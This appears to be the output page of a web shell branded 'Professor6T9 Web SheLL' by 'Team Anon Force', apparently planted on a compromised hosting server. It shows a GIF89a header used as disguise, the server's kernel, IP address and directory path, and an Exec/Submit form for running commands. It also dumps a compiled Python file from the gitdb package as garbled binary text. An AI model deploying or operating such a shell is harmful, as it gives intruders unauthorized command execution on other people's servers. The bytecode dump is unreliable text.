GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
gitdb
/
__pycache__
[ HOME ]
Exec
Submit
File Name : exc.cpython-311.pyc
� �|oi � � � d Z ddlmZ G d� de� � Z G d� de� � Z G d� de� � Z G d � d e� � Z G d� de� � Z G d � de� � Z G d� de� � Z G d� de� � ZdS )zModule with common exceptions� )� to_hex_shac � � e Zd ZdZdS )�ODBErrorz(All errors thrown by the object databaseN��__name__� __module__�__qualname__�__doc__� � �[/builddir/build/BUILD/cloudlinux-venv-1.0.10/venv/lib/python3.11/site-packages/gitdb/exc.pyr r s � � � � � �2�2�2�2r r c � � e Zd ZdZdS )� InvalidDBRootzDThrown if an object database cannot be initialized at the given pathNr r r r r r s � � � � � �N�N�N�Nr r c � � e Zd ZdZd� ZdS )� BadObjectzQThe object with the given SHA does not exist. Instantiate with the failed shac �<